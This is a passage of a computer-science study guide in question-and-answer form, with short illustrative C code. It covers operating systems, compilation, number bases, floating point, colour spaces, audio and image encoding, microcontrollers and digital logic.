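int mbr_is_bootable(const uint8_t sector[512]) {
    return sector[510] == 0x55 && sector[511] == 0xAA;
}
```

A BIOS that probes several media can skip any whose first sector fails this signature check.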
Describe the functionality provided by a general purpose operating system. See architecture of Windows NT, Android, OS X.
User mode in Windows NT is made of subsystems capable of passing I/O requests to the appropriate kernel mode device drivers by using the I/O manager. The user mode layer of Windows NT is made up of the "Environment subsystems," which run applications written for many different types of operating systems, and the "Integral subsystem," which operates system specific functions on behalf of environment subsystems.
What are the main differences between real mode and protected mode of an x86-based processor?
If your computer is in real mode, software communicates directly with the computer's ports and devices. For example, when you print a document, the software sends the data stream directly to the port that holds the printer. However, this paradigm doesn't work in a multitasking OS. Imagine what would happen if multiple programs sent data streams to the ports simultaneously. Ports are dumb, and they have no ability to filter or arrange data streams to match the sending programs. If your computer is in protected mode, the system's ports and devices are protected from the applications that use them. The software thinks it's sending data to a port, but it's a virtual port. The OS is grabbing the data stream and managing it, to ensure that all applications have equal access and to ensure that data from each application is appropriately preserved.
What happens during context switch?
In a switch, the state of the first process (the process currently executing, which is to be switched out) must be saved, so that when the scheduler returns to it, the state can be restored and execution can continue. The state of the process includes all the registers that the process may be using, especially the program counter, plus any other operating-system-specific data that may be necessary. This data is usually stored in a data structure called a process control block (PCB), or switchframe. In order to switch processes, the PCB for the first process must be created and saved. The PCBs are sometimes stored on a per-process stack in kernel memory (as opposed to the user-mode call stack), or there may be some specific operating-system-defined data structure for this information. Since the operating system has effectively suspended the execution of the first process, it can now load the PCB and context of the second process. In doing so, the program counter from the PCB is loaded, and thus execution can continue in the new process. New processes are chosen from a queue or queues (often referred to as the ready queue). Process and thread priority can influence which process continues execution, with processes of the highest priority checked first for ready threads to execute.
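The save and restore steps described above can be sketched in C. This is only a toy model: the `pcb_t` and `cpu_t` structures and the `context_switch` function are hypothetical names made up for illustration. A real kernel does this in architecture-specific assembly and keeps far more state per process.

```c
#include <stdint.h>

/* Hypothetical, simplified process control block (PCB). Real kernels
   store many more fields (memory maps, open files, accounting data). */
typedef struct {
    int      pid;
    uint32_t regs[4];  /* general-purpose registers */
    uint32_t pc;       /* program counter */
} pcb_t;

/* Hypothetical model of the register state held by the CPU. */
typedef struct {
    uint32_t regs[4];
    uint32_t pc;
} cpu_t;

/* Save the state of the running process into its PCB, then load the
   state of the next process so that it resumes where it stopped. */
void context_switch(cpu_t *cpu, pcb_t *current, const pcb_t *next)
{
    for (int i = 0; i < 4; i++) {
        current->regs[i] = cpu->regs[i];
        cpu->regs[i] = next->regs[i];
    }
    current->pc = cpu->pc;
    cpu->pc = next->pc;
}
```

After the call, the CPU model holds the registers and program counter of the next process, while the PCB of the first process holds everything needed to resume it later.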
What is the purpose of paged virtual memory?
In computing, virtual memory is a memory management technique that is implemented using both hardware and software. It maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or a collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory. Address translation hardware in the CPU, often referred to as a memory management unit or MMU, automatically translates virtual addresses to physical addresses. Software within the operating system may extend these capabilities to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physically present in the computer. The primary benefits of virtual memory include freeing applications from having to manage a shared memory space, increased security due to memory isolation, and being able to conceptually use more memory than might be physically available, using the technique of paging.
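The translation done by the MMU can be illustrated with a minimal sketch in C. It assumes 4 KiB pages and a single-level page table with 16 entries. The names `pte_t` and `translate` are hypothetical, and real hardware uses multi-level tables and caches translations in a TLB.

```c
#include <stdint.h>

#define PAGE_SIZE   4096u   /* assumed page size: 4 KiB */
#define PAGE_SHIFT  12u     /* log2(PAGE_SIZE) */
#define NUM_PAGES   16u     /* assumed size of the toy address space */

/* Hypothetical page table entry: a frame number plus a "present" flag. */
typedef struct {
    uint32_t frame;
    int      present;
} pte_t;

/* Translate a virtual address using a single-level page table.
   Returns 0 on success and stores the result in *phys; returns -1
   for a page fault (page not mapped or out of range). */
int translate(const pte_t table[NUM_PAGES], uint32_t virt, uint32_t *phys)
{
    uint32_t page   = virt >> PAGE_SHIFT;        /* upper bits: page number */
    uint32_t offset = virt & (PAGE_SIZE - 1u);   /* lower 12 bits: offset */

    if (page >= NUM_PAGES || !table[page].present)
        return -1;

    *phys = (table[page].frame << PAGE_SHIFT) | offset;
    return 0;
}
```

With virtual page 2 mapped to physical frame 7, the virtual address 0x2ABC translates to 0x7ABC: the page number is replaced and the offset within the page is kept.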
Programming languages
What are the major steps of compilation?
1. Lexical analysis (scanning): the source text is broken into tokens.
2. Syntactic analysis (parsing): tokens are combined to form syntactic structures, typically represented by a parse tree. The parser may be replaced by a syntax-directed editor, which directly generates a parse tree as a product of editing.
3. Semantic analysis: intermediate code is generated for each syntactic structure. Type checking is performed in this phase. Complicated features such as generic declarations and operator overloading (as in Ada and C++) are also processed.
4. Machine-independent optimization: intermediate code is optimized to improve efficiency.
5. Code generation: intermediate code is translated to relocatable object code for the target machine.
6. Machine-dependent optimization: the machine code is optimized.
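As an illustration of the first step, lexical analysis, here is a minimal scanner sketch in C for a made-up arithmetic language. The token kinds and the `next_token` function are hypothetical. A production lexer would also handle multi-character operators, comments, string literals and error reporting.

```c
#include <ctype.h>
#include <stddef.h>

/* Hypothetical token kinds for a tiny arithmetic language. */
typedef enum { TOK_NUMBER, TOK_IDENT, TOK_OP, TOK_END } tok_kind;

typedef struct {
    tok_kind    kind;
    const char *start;  /* first character of the token */
    size_t      len;    /* number of characters in the token */
} token;

/* Scan the next token starting at *src and advance *src past it. */
token next_token(const char **src)
{
    const char *p = *src;
    token t;

    while (isspace((unsigned char)*p))   /* skip whitespace between tokens */
        p++;

    t.start = p;
    if (*p == '\0') {
        t.kind = TOK_END;
    } else if (isdigit((unsigned char)*p)) {
        t.kind = TOK_NUMBER;
        while (isdigit((unsigned char)*p))
            p++;
    } else if (isalpha((unsigned char)*p) || *p == '_') {
        t.kind = TOK_IDENT;
        while (isalnum((unsigned char)*p) || *p == '_')
            p++;
    } else {
        t.kind = TOK_OP;                 /* any other single character */
        p++;
    }
    t.len = (size_t)(p - t.start);
    *src = p;
    return t;
}
```

Calling `next_token` repeatedly on the text `x1 = 42+y` yields an identifier, an operator, a number, an operator, an identifier and finally the end marker. The parser would then combine these tokens into a parse tree.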
What are the differences between interpreted, JIT-compilation and traditional compiling?
Traditional compiled languages are translated by a compiler into the processor's native machine code up front, well before the program is run. Compilation can take many passes before the machine code is optimized, but the output is always code that is ready to be executed directly, and that executes efficiently as a result. Some compiled languages include:
• C
• C++
• C# (compiled ahead of time, but to intermediate bytecode rather than machine code, see JIT below)
Interpreted languages: an interpreted language is any programming language whose programs are not already in machine code prior to runtime. Unlike with compiled languages, the translation does not happen beforehand; it occurs at the same time as the program is being executed. Some interpreted languages include:
• Java (compiled to bytecode, which the JVM interprets or JIT-compiles)
• JavaScript
• PHP
• Perl
• Python
• Ruby
"Just in Time" (JIT) compilers: a JIT compiler translates code to machine code while the program is running, and it can keep improving the generated code over time, for example by optimizing the parts that run most often. Java has a JIT compiler as part of the Java Virtual Machine (JVM); C# has one within the .NET framework; and Android has a JIT in its Dalvik Virtual Machine (DVM).
What is control flow? Loops? Conditional statements?
Control flow (or alternatively, flow of control) is the order in which individual statements, instructions or function calls of an imperative program are executed or evaluated. The emphasis on explicit control flow distinguishes an imperative programming language from a declarative programming language.
A loop is a sequence of instructions that is continually repeated until a certain condition is reached. Typically, a certain process is done, such as getting an item of data and changing it, and then some condition is checked, such as whether a counter has reached a prescribed number.
Conditional statements, conditional expressions and conditional constructs are features of a programming language which perform different computations or actions depending on whether a programmer-specified boolean condition evaluates to true or false. Apart from the case of branch predication, this is always achieved by selectively altering the control flow based on some condition.
Data encoding
What is bit? Nibble? Byte? Word?
Bit is the basic unit of information; it can hold one of two values, true or false (1 or 0).
Nibble is half of an octet, that is, four bits.
Byte is a unit of eight bits. Historically, it was the number of bits used to encode a single character of text in a computer.
Word is the number of bits a processor architecture handles as a single unit (for example 8, 16, 32 or 64 bits).
Write 9375 in binary, hexadecimal?
Binary, or the base two counting system, starts from the right with position 0 and continues to the left, each position being worth the next power of 2.
2^13 | 2^12 | 2^11 | 2^10 | 2^9 | 2^8 | 2^7 | 2^6 | 2^5 | 2^4 | 2^3 | 2^2 | 2^1 | 2^0 |
8192 | 4096 | 2048 | 1024 | 512 | 256 | 128 | 64 | 32 | 16 | 8 | 4 | 2 | 1 |
1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 |
To convert a decimal number (9375) to binary, start from the largest power of two and check whether it fits into what remains. 8192 fits into 9375, so mark down 1 and continue with 9375 - 8192 = 1183. 4096 and 2048 do not fit into 1183, so mark 0 for both. 1024 fits, so mark 1 and continue with 1183 - 1024 = 159, and so on. The number 9375 in base ten is 0b10010010011111 in binary, where the '0b' prefix denotes base two. Conversion from binary to decimal works the other way around: add up the powers of two that are marked with 1. If perplexed, see the explanatory video on Khan Academy.
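The subtraction method for decimal to binary conversion can be written down as a short C function. This is a sketch for 32-bit unsigned values, and the function name `to_binary` is made up for this example.

```c
#include <stdint.h>

/* Write the binary digits of value into out, most significant digit
   first and without leading zeros. out must have room for 33 chars. */
void to_binary(uint32_t value, char out[33])
{
    int pos = 0;
    int started = 0;   /* becomes 1 once the first '1' has been written */

    for (int bit = 31; bit >= 0; bit--) {
        uint32_t power = (uint32_t)1 << bit;   /* 2^bit */
        if (value >= power) {
            out[pos++] = '1';    /* this power of two fits: mark 1 */
            value -= power;      /* and continue with the remainder */
            started = 1;
        } else if (started) {
            out[pos++] = '0';    /* does not fit: mark 0 */
        }
    }
    if (!started)
        out[pos++] = '0';        /* the value was zero */
    out[pos] = '\0';
}
```

For the value 9375 the function produces the string 10010010011111, the same digits as in the table.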
Hexadecimal or base 16 system goes from 0 until 9, then starts with A (10 base 10) until F (15 base 10).
0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | A | B | C | D | E | F |
Conversion from decimal to hex is similar to the decimal to base two conversion. First, we figure out the powers of 16:
16^0 | 16^1 | 16^2 | 16^3 | 16^4 |
1 | 16 | 256 | 4096 | 65 536 |
F | 9 | 4 | 2 | <- |
9375 contains 4096 two times (9375 - 2*4096 = 9375 - 8192 = 1183), 1183 contains 256 four times (1183 - 4*256 = 159), 159 contains 16 nine times (159 - 9*16 = 15), and the remaining 15 is F in hex, so we arrive at 0x249F. As with base 2, the same table can be used to convert from hex to decimal. If you still don't get it, watch a video on Khan Academy.
Write 0xDEADBEEF in decimal?
Following the table above, each of the eight hex digits is multiplied by its power of 16: 13x16^7 + 14x16^6 + 10x16^5 + 13x16^4 + 11x16^3 + 14x16^2 + 14x16^1 + 15x16^0 = 3735928559.
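The same hex to decimal calculation can be done in C by processing the digits from left to right and multiplying the running total by 16 at each step, which is equivalent to summing digit times power of 16. The function names below are made up for illustration.

```c
#include <stdint.h>

/* Value of a single hexadecimal digit, or -1 if c is not a hex digit. */
int hex_digit(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Convert a string of hex digits (without the 0x prefix) to its value.
   Conversion stops at the first character that is not a hex digit.
   Assumes at most 16 digits, so that the result fits into 64 bits. */
uint64_t hex_to_decimal(const char *s)
{
    uint64_t value = 0;
    int d;

    while ((d = hex_digit(*s)) >= 0) {
        value = value * 16 + (uint64_t)d;   /* shift left one hex digit */
        s++;
    }
    return value;
}
```

Here `hex_to_decimal("DEADBEEF")` returns 3735928559 and `hex_to_decimal("249F")` returns 9375.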
What is quantization in terms of signal processing?
Quantization, in mathematics and digital signal processing, is the process of mapping a large set of input values to a (countable) smaller set. Rounding and truncation are typical examples of quantization processes. Quantization is involved to some degree in nearly all digital signal processing, as the process of representing a signal in digital form ordinarily involves rounding. Quantization also forms the core of essentially all lossy compression algorithms. The difference between an input value and its quantized value (such as round-off error) is referred to as quantization error. A device or algorithmic function that performs quantization is called a quantizer. An analog-to-digital converter is an example of a quantizer.
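A uniform quantizer that rounds to the nearest multiple of a step size is one of the simplest examples. The sketch below uses made-up function names and assumes that the step is positive and that the scaled value fits into a `long long`.

```c
/* Quantize x to the nearest multiple of step (step must be > 0).
   Ties are rounded away from zero. */
double quantize(double x, double step)
{
    double scaled = x / step;
    /* round to the nearest integer without needing the math library */
    long long n = (long long)(scaled >= 0.0 ? scaled + 0.5 : scaled - 0.5);
    return (double)n * step;
}

/* Quantization error: the difference between input and quantized value. */
double quantization_error(double x, double step)
{
    return x - quantize(x, step);
}
```

With a step of 0.25, the input 0.30 is quantized to 0.25 and the quantization error is about 0.05. The error of this quantizer is never larger than half a step.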
How are integers stored in binary? What integer range can be described using n bits? How many bits are required to describe integer range from n .. m.
If we want to store an integer then it makes sense to store the binary representation of the integer, and in one byte we could store any of the numbers 0 through 255, with the usual binary representation
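Integer range using n bits:
Signed (two's complement): -2^(n-1) to 2^(n-1) - 1
Unsigned: 0 to 2^n - 1
How many bits are required to describe the integer range from n .. m?
The range contains m - n + 1 distinct values, so the number of bits b must satisfy b >= log_2(m - n + 1), rounded up to a whole number. For the range 0 .. m this becomes b >= log_2(m + 1).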
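The number of bits needed for a range can also be computed without logarithms, by finding the smallest b for which 2^b is at least the number of distinct values in the range. The sketch below uses made-up function names and assumes the range contains fewer than 2^64 values.

```c
#include <stdint.h>

/* Number of bits needed to tell apart `count` distinct values,
   i.e. the smallest b such that 2^b >= count. */
unsigned bits_for_count(uint64_t count)
{
    unsigned bits = 0;

    while (bits < 64 && ((uint64_t)1 << bits) < count)
        bits++;
    return bits;
}

/* Bits needed to describe the integer range lo..hi inclusive.
   Assumes lo <= hi and fewer than 2^64 values in the range. */
unsigned bits_for_range(int64_t lo, int64_t hi)
{
    /* unsigned arithmetic avoids signed overflow for wide ranges */
    return bits_for_count((uint64_t)hi - (uint64_t)lo + 1);
}
```

For example, both 0 .. 255 and -128 .. 127 contain 256 values and need 8 bits, while 0 .. 256 needs 9 bits.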
How are single precision and double precision floating point numbers stored in binary according to IEEE754 standard? Floating-point multiplication
single precision
Single precision (binary32) uses 32 bits: 1 sign bit, 8 exponent bits and 23 fraction (significand) bits.
This gives from 6 to 9 significant decimal digits of precision (if a decimal string with at most 6 significant decimal digits is converted to IEEE 754 single precision and then converted back to the same number of significant decimal digits, then the final string should match the original; and if an IEEE 754 single precision number is converted to a decimal string with at least 9 significant decimal digits and then converted back to single, then the final number must match the original[4]).
The sign bit determines the sign of the number, which is the sign of the significand as well. The exponent field is an 8 bit unsigned integer from 0 to 255 in biased form: the exponent used in the arithmetic is the stored value minus a bias of 127, so a stored value of 127 represents an actual exponent of zero (for 2^(e - 127) to be one, e must be 127).
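The three fields of a single precision number can be inspected from C. The sketch below assumes that the platform's `float` type is IEEE 754 binary32, which holds on mainstream hardware but is not guaranteed by the C standard. The names `float_fields` and `decode_float` are made up for illustration.

```c
#include <stdint.h>
#include <string.h>

typedef struct {
    uint32_t sign;      /* 1 bit: 0 = positive, 1 = negative */
    uint32_t exponent;  /* 8 bits, stored with a bias of 127 */
    uint32_t fraction;  /* 23 bits of the significand */
} float_fields;

/* Split a float into its sign, exponent and fraction fields.
   Assumes float is a 32-bit IEEE 754 binary32 value. */
float_fields decode_float(float f)
{
    uint32_t bits;
    float_fields out;

    memcpy(&bits, &f, sizeof bits);   /* copy the raw bit pattern */
    out.sign     = bits >> 31;
    out.exponent = (bits >> 23) & 0xFFu;
    out.fraction = bits & 0x7FFFFFu;
    return out;
}
```

For 1.0f the stored exponent is 127 (an actual exponent of zero) and the fraction is 0. For -2.5f, which is -1.25 × 2^1, the sign is 1, the stored exponent is 128 and the fraction is 0x200000.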
double precision
Double precision (binary64) uses 64 bits: 1 sign bit, 11 exponent bits (stored with a bias of 1023) and 52 fraction bits.
This gives 15–17 significant decimal digits of precision. If a decimal string with at most 15 significant digits is converted to IEEE 754 double precision representation and then converted back to a string with the same number of significant digits, then the final string should match the original. If an IEEE 754 double precision number is converted to a decimal string with at least 17 significant digits and then converted back to double, then the final number must match the original.[1]
What is the difference between CMYK and RGB color models? How are YUV, HSV and HSL colorspaces related to RGB? What are sRGB and YCbCr and where are they used?
RGB is based on projecting. Red light plus Green light plus Blue light all projected together create white. Black is encoded as the absence of any color.
CMYK is based on ink. Superimpose Cyan ink plus Magenta ink plus Yellow ink, and you get black, although this format also encodes Black (K) directly. White is encoded by the absence of any color.
Even though it uses one more number to encode a color, the CMYK scheme encodes a smaller "color space" than does RGB.
When a color is converted from RGB to CMYK, the appearance may change. Most noticeably, bright colors in RGB will look duller and darker in CMYK
How are YUV, HSV and HSL colorspaces related to RGB?
HSV (hue, saturation, value), also known as HSB (hue, saturation, brightness), is often used by artists because it is often more natural to think about a color in terms of hue and saturation than in terms of additive or subtractive color components. HSV is a transformation of an RGB colorspace, and its components and colorimetry are relative to the RGB colorspace from which it was derived.
HSL (hue, saturation, lightness/luminance), also known as HSI (hue, saturation, intensity) or HSD (hue, saturation, darkness), is quite similar to HSV, with "lightness" replacing "brightness". The difference is that the brightness of a pure color is equal to the brightness of white, while the lightness of a pure color is equal to the lightness of a medium gray.
YUV is a color space typically used as part of a color image pipeline. It encodes a color image or video taking human perception into account, allowing reduced bandwidth for the chrominance components, so that transmission errors or compression artifacts are typically masked more efficiently by human perception than with a "direct" RGB representation.
What are sRGB and YCbCr and where are they used?
sRGB is a standard RGB color space created cooperatively by HP and Microsoft in 1996 for use on monitors, printers and the Internet.
YCbCr is a family of color spaces used as a part of the color image pipeline in video and digital photography systems. It is used in MPEG compression (DVDs, digital TV and Video CDs), and digital camcorders (MiniDV, DV, Digital Betacam, etc.) output YCbCr over a digital link such as FireWire or SDI. The ITU-R BT.601 international standard for digital video defines both YCbCr and RGB color spaces.
How is data encoded on audio CD-s? What is the capacity of an audio CD?
CD data is represented as tiny indentations known as "pits", encoded in a spiral track moulded into the top of the polycarbonate layer. The areas between pits are known as "lands". Each pit is approximately 100 nm (nanometre) deep by 500 nm wide, and varies from 850 nm to 3.5 µm in length. The distance between the tracks, the pitch, is 1.6 µm.
Capacity of an audio CD: the goal of the engineers who designed the audio CD was reportedly to make it possible for a single disc to contain Beethoven's Ninth Symphony performed by London Philharmonic Orchestra. That means roughly 80 minutes of audio data. An audio CD stores 44100 samples per second for each of two channels, with 16 bits per sample, so we can easily calculate the minimum data capacity for such a disc:
80 min × 60 sec/min × 44100 samples/sec × 2 ch × 16 bits/sample
That results in:
6773760000 bits = 846720000 bytes ≈ 800 MB
This is incidentally close to the size of an average user-writable CD-R disc (an 80-minute CD-R holds about 700 MB in data mode, because data sectors spend part of the space on extra error correction).
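The capacity calculation is easy to reproduce in C. The helper names below are made up. The parameters are the audio CD values used in the calculation: 44100 samples per second, 2 channels and 16 bits per sample.

```c
#include <stdint.h>

/* Bitrate of uncompressed PCM audio in bits per second. */
uint64_t pcm_bitrate(uint64_t sample_rate_hz, uint64_t channels,
                     uint64_t bits_per_sample)
{
    return sample_rate_hz * channels * bits_per_sample;
}

/* Size in bytes of `seconds` of uncompressed PCM audio. */
uint64_t pcm_bytes(uint64_t seconds, uint64_t sample_rate_hz,
                   uint64_t channels, uint64_t bits_per_sample)
{
    return seconds * pcm_bitrate(sample_rate_hz, channels, bits_per_sample) / 8;
}
```

`pcm_bitrate(44100, 2, 16)` gives 1411200 bit/s, and `pcm_bytes(80 * 60, 44100, 2, 16)` gives 846720000 bytes for 80 minutes of audio.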
What is sampling rate? What is bit depth? What is resolution?
SAMPLE RATE: Sample rate is the number of samples of audio carried per second, measured in Hz or kHz (one kHz being 1 000 Hz). For example, 44 100 samples per second can be expressed as either 44 100 Hz, or 44.1 kHz. Bandwidth is the difference between the highest and lowest frequencies carried in an audio stream
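BIT DEPTH: Bit depth is the number of bits used to store each sample. In audio it is the number of bits per audio sample (16 bits on an audio CD). In an image it refers to the color information stored per pixel: the higher the bit depth of an image, the more colors it can store. The simplest image, a 1 bit image, can only show two colors, black and white.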
RESOLUTION: Resolution is the number of pixels (individual points of color) contained on a display monitor, expressed in terms of the number of pixels on the horizontal axis and the number on the vertical axis. The sharpness of the image on a display depends on the resolution and the size of the monitor.
What is bitrate?
Bitrate is the number of bits that are conveyed or processed per unit of time.
The bit rate is quantified using the bits per second unit (symbol: "bit/s"), often in conjunction with an SI prefix such as "kilo" (1 kbit/s = 1000 bit/s), "mega" (1 Mbit/s = 1000 kbit/s), "giga" (1 Gbit/s = 1000 Mbit/s) or "tera" (1 Tbit/s = 1000 Gbit/s).[2] The non-standard abbreviation "bps" is often used to replace the standard symbol "bit/s", so that, for example, "1 Mbps" is used to mean one million bits per second.
One byte per second (1 B/s) corresponds to 8 bit/s.
What is lossy/lossless compression?
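Lossless and lossy compression are terms that describe whether or not, in the compression of a file, all original data can be recovered when the file is uncompressed. With lossless compression, every single bit of data that was originally in the file remains after the file is uncompressed. With lossy compression, some of the information is permanently discarded to make the file smaller, so the uncompressed result is only an approximation of the original.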
What is JPEG suitable for? Is JPEG lossy or lossless compression method?
JPEG is a standardised image compression mechanism. JPEG is designed for compressing either full-colour (24 bit) or grey-scale digital images of "natural" (real-world) scenes.
It works well on photographs, naturalistic artwork, and similar material; not so well on lettering, simple cartoons, or black-and-white line drawings (files come out very large). JPEG handles only still images, but there is a related standard called MPEG for motion pictures.
JPEG is "lossy", meaning that the image you get out of decompression isn't quite identical to what you originally put in.
What is PNG suitable for? Does PNG support compression?
PNG is suitable for images with sharp edges and flat areas of color, such as logos, screenshots, lettering and line drawings, and for images that need transparency, which allows for some nice effects for websites and images.
Yes, PNG supports compression. PNG files are lossless, which means that they do not lose quality when they are edited and saved again. This is unlike JPEGs, which lose quality each time they are re-saved. PNG files tend to be larger than JPEGs, because they keep all of the image information. PNG files do not support animation; for this purpose, a GIF should be used.
How are time domain and frequency domain related in terms of signal processing? What is Fourier transform and where it is applied?
Signals are commonly processed in one of the following domains: time domain (one-dimensional signals), spatial domain (multidimensional signals), frequency domain, and wavelet domains. Engineers choose the domain in which to process a signal by making an informed assumption (or by trying different possibilities) as to which domain best represents the essential characteristics of the signal. A sequence of samples from a measuring device produces a temporal or spatial domain representation, whereas a discrete Fourier transform produces the frequency domain information, that is, the frequency spectrum. Autocorrelation is defined as the cross-correlation of the signal with itself over varying intervals of time or space.
Fourier transform and where it is applied?
Fourier transforms (FT) take a signal and express it in terms of the frequencies of the waves that make up that signal. Sound is probably the easiest thing to think about when talking about Fourier transforms.
Fourier transform methods are important in audio applications, quantum mechanics, optics, and all sorts of wave phenomena.
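To make the idea concrete, here is a sketch of a naive 8-point discrete Fourier transform in C. To stay independent of the math library, the cosine and sine values for the eight possible angles are tabulated. The table names and the `dft8` function are made up for this example, and practical code would use an FFT library for arbitrary lengths.

```c
#define DFT_N 8
#define R2 0.70710678118654752440  /* sqrt(2)/2 */

/* cos(2*pi*j/8) and sin(2*pi*j/8) for j = 0..7. */
static const double COS8[DFT_N] = { 1.0,  R2, 0.0, -R2, -1.0, -R2,  0.0,  R2 };
static const double SIN8[DFT_N] = { 0.0,  R2, 1.0,  R2,  0.0, -R2, -1.0, -R2 };

/* Naive 8-point discrete Fourier transform of a real signal:
   X[k] = sum over n of x[n] * (cos(2*pi*k*n/8) - i*sin(2*pi*k*n/8)).
   re[k] and im[k] receive the real and imaginary part of X[k]. */
void dft8(const double x[DFT_N], double re[DFT_N], double im[DFT_N])
{
    for (int k = 0; k < DFT_N; k++) {
        re[k] = 0.0;
        im[k] = 0.0;
        for (int n = 0; n < DFT_N; n++) {
            int j = (k * n) % DFT_N;   /* the angle wraps around every 8 steps */
            re[k] += x[n] * COS8[j];
            im[k] -= x[n] * SIN8[j];
        }
    }
}
```

If the input is one period of a cosine wave (the values of `COS8`), all the energy ends up in bins 1 and 7, each with a real part of about 4, and the other bins are about zero. The transform has found the single frequency that makes up the signal.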
Microcontrollers
What distinguishes microcontroller from microprocessor?
MICROPROCESSOR | MICROCONTROLLER |
Microprocessor is the heart of a computer system. | Microcontroller is the heart of an embedded system. |
It is just a processor. Memory and I/O components have to be connected externally. | Microcontroller has a processor along with internal memory and I/O components on a single chip. |
Since memory and I/O have to be connected externally, the circuit becomes large. | Since memory and I/O are present internally, the circuit is small. |
Cannot be used in compact systems and is hence inefficient for them. | Can be used in compact systems and is hence an efficient technique for them. |
Cost of the entire system increases. | Cost of the entire system is low. |
Due to external components, the total power consumption is high. Hence it is not suitable for devices running on stored power like batteries. | Since there are few external components, total power consumption is lower and it can be used with devices running on stored power like batteries. |
Most microprocessors do not have power saving features. | Most microcontrollers have power saving modes like idle mode and power saving mode. This helps to reduce power consumption even further. |
Since memory and I/O components are all external, each instruction needs an external operation, hence it is relatively slower. | Since components are internal, most of the operations are internal, hence speed is fast. |
Microprocessors have fewer registers, hence more operations are memory based. | Microcontrollers have more registers, hence the programs are easier to write. |
Microprocessors are based on the von Neumann model/architecture, where program and data are stored in the same memory module. | Microcontrollers are based on the Harvard architecture, where program memory and data memory are separate. |
Mainly used in personal computers. | Used mainly in washing machines, MP3 players. |
What are the differences between Harvard architecture and von Neumann architecture?
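In the von Neumann architecture, instructions and data share the same memory and the same bus, so the processor can do only one memory operation at a time: it cannot read or write data while it is fetching an instruction. A computer with the Harvard architecture has separate memories and buses for instructions and data, so it can fetch an instruction and access data at the same time.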
What is an interrupt?
Interrupt is a signal that there is something that requires immediate attention from the processing unit. Processor suspends its current activities, saves its state, deals with the temporary interrupt and returns itself to the previous state.
What is a timer?
A timer is a hardware counter that tracks the passage of time by counting pulses of the clock oscillator built into the hardware. Software can read the counter, or have the timer raise an interrupt when a set count is reached.
Hardware description language
What are the uses for hardware description languages?
In electronics, a hardware description language (HDL) is a specialized computer language used to program the structure, design and operation of electronic circuits, and most commonly, digital logic circuits.
A hardware description language enables a precise, formal description of an electronic circuit that allows for the automated analysis, simulation, and simulated testing of an electronic circuit. It also allows for the compilation of an HDL program into a lower level specification of physical electronic components, such as the set of masks used to create an integrated circuit.
A hardware description language looks much like a programming language such as C; it is a textual description consisting of expressions, statements and control structures. One important difference between most programming languages and HDLs is that HDLs explicitly include the notion of time.
What is latch?
A latch is an example of a bistable multivibrator, that is, a device with exactly two stable states. These states are high-output and low-output. A latch has a feedback path, so information can be retained by the device. Therefore latches can be memory devices, and can store one bit of data for as long as the device is powered. As the name suggests, latches are used to "latch onto" information and hold in place. Latches are very similar to flip-flops, but are not synchronous devices, and do not operate on clock edges as flip-flops do.
What is flip-flop?
A flip-flop is a device very like a latch in that it is a bistable multivibrator, having two states and a feedback path that allows it to store a bit of information. The difference between a latch and a flip-flop is that a latch is asynchronous, and the outputs can change as soon as the inputs do (or at least after a small propagation delay). A flip-flop, on the other hand, is edge-triggered and only changes state when a control signal goes from high to low or low to high. This distinction is relatively recent and is not formal, with many authorities still referring to flip-flops as latches and vice versa, but it is a helpful distinction to make for the sake of clarity.
There are several different types of flip-flop each with its own uses and peculiarities. The four main types of flip-flop are : SR, JK, D, and T.
What is mux (multiplexer)?
A multiplexer (or mux) is a device that selects one of several analog or digital input signals and forwards the selected input into a single line.[1] A multiplexer of 2^n inputs has n select lines, which are used to select which input line to send to the output.[2] Multiplexers are mainly used to increase the amount of data that can be sent over the network within a certain amount of time and bandwidth.[1] A multiplexer is also called a data selector.
An electronic multiplexer makes it possible for several signals to share one device or resource, for example one A/D converter or one communication line, instead of having one device per input signal.
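The behaviour of a multiplexer can be modelled in a few lines of C. The sketch below works on single bits: `mux2` is written as the gate-level equation of a 2-to-1 multiplexer, and `mux4` builds a 4-to-1 multiplexer with two select lines out of three 2-to-1 stages. Both function names are made up for illustration.

```c
/* 2-to-1 multiplexer on single bits: out = (a AND NOT sel) OR (b AND sel).
   sel must be 0 or 1; sel = 0 selects a, sel = 1 selects b. */
unsigned mux2(unsigned a, unsigned b, unsigned sel)
{
    return ((a & ~sel) | (b & sel)) & 1u;
}

/* 4-to-1 multiplexer built from three 2-to-1 multiplexers.
   The two select lines are taken from the low two bits of sel. */
unsigned mux4(unsigned in0, unsigned in1, unsigned in2, unsigned in3,
              unsigned sel)
{
    unsigned s0 = sel & 1u;          /* low select line */
    unsigned s1 = (sel >> 1) & 1u;   /* high select line */
    unsigned low  = mux2(in0, in1, s0);
    unsigned high = mux2(in2, in3, s0);

    return mux2(low, high, s1);
}
```

With four inputs (2^2), two select lines are enough: `sel = 0` forwards `in0`, `sel = 1` forwards `in1`, `sel = 2` forwards `in2` and `sel = 3` forwards `in3`.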
What is register? Register file?
Registers are a special, high-speed storage area within the CPU. All data must be represented in a register before it can be processed. For example, if two numbers are to be multiplied, both numbers must be in registers, and the result is also placed in a register. A register may hold a computer instruction , a storage address, or any kind of data (such as a bit sequence or individual characters). A register must be large enough to hold an instruction - for example, in a 32-bit instruction computer, a register must be 32 bits in length. In some computer designs, there are smaller registers - for example, half-registers - for shorter instructions. Depending on the processor design and language rules, registers may be numbered or have arbitrary names.
A register file is an array of processor registers in a central processing unit (CPU). Modern integrated circuit-based register files are usually implemented by way of fast static RAMs with multiple ports. Such RAMs are distinguished by having dedicated read and write ports, whereas ordinary multiported SRAMs will usually read and write through the same ports.
The instruction set architecture of a CPU will almost always define a set of registers which are used to stage data between memory and the functional units on the chip. In simpler CPUs, these architectural registers correspond one-for-one to the entries in a physical register file within the CPU. More complicated CPUs use register renaming, so that the mapping of which physical entry stores a particular architectural register changes dynamically during execution. The register file is part of the architecture and visible to the programmer, as opposed to the concept of transparent caches.
What is ALU?
